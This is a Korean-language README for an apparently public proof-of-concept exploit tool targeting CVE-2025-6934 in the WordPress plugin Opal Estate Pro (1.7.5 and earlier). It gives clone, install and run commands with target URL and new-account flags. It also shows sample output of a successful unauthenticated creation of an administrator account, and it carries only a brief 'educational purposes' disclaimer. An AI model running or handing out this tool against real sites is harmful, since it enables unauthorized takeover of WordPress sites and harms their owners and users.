
취약한 버전을 탐지하고, nonce를 검색하며, 승인되지 않은 관리자 계정을 생성하는 WordPress Opal Estate Pro용 자동화 PoC 익스플로잇입니다.
CVE-2025-6934는 WordPress 플러그인: Opal Estate Pro ≤ 1.7.5를 대상으로 하는 개념 증명(PoC) 익스플로잇입니다.
이 익스플로잇은 인증 없이 관리자 계정 생성을 시연합니다.
면책 조항: 이 PoC는 교육 목적으로만 제공됩니다. 허가 없이 시스템에 사용하지 마십시오.
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
요구 사항:
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
콘솔에는 다음이 표시됩니다:
[•][✔][✖][i]예시:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
저는 도구를 만들고 지식을 공유하는 것을 즐기는 활동적인 개발자입니다. 다음 경로로 연락하실 수 있습니다:
| 플래그 | 설명 | 필수 | 기본값 |
|---|
-u, --url | 대상 사이트 URL | 예 | - |
-mail, --newmail | 새 관리자 이메일 | 예 | - |
-password, --newpassword | 새 관리자 비밀번호 | 예 | - |
-user, --username | 새 관리자 사용자 이름 | 아니요 | administrator |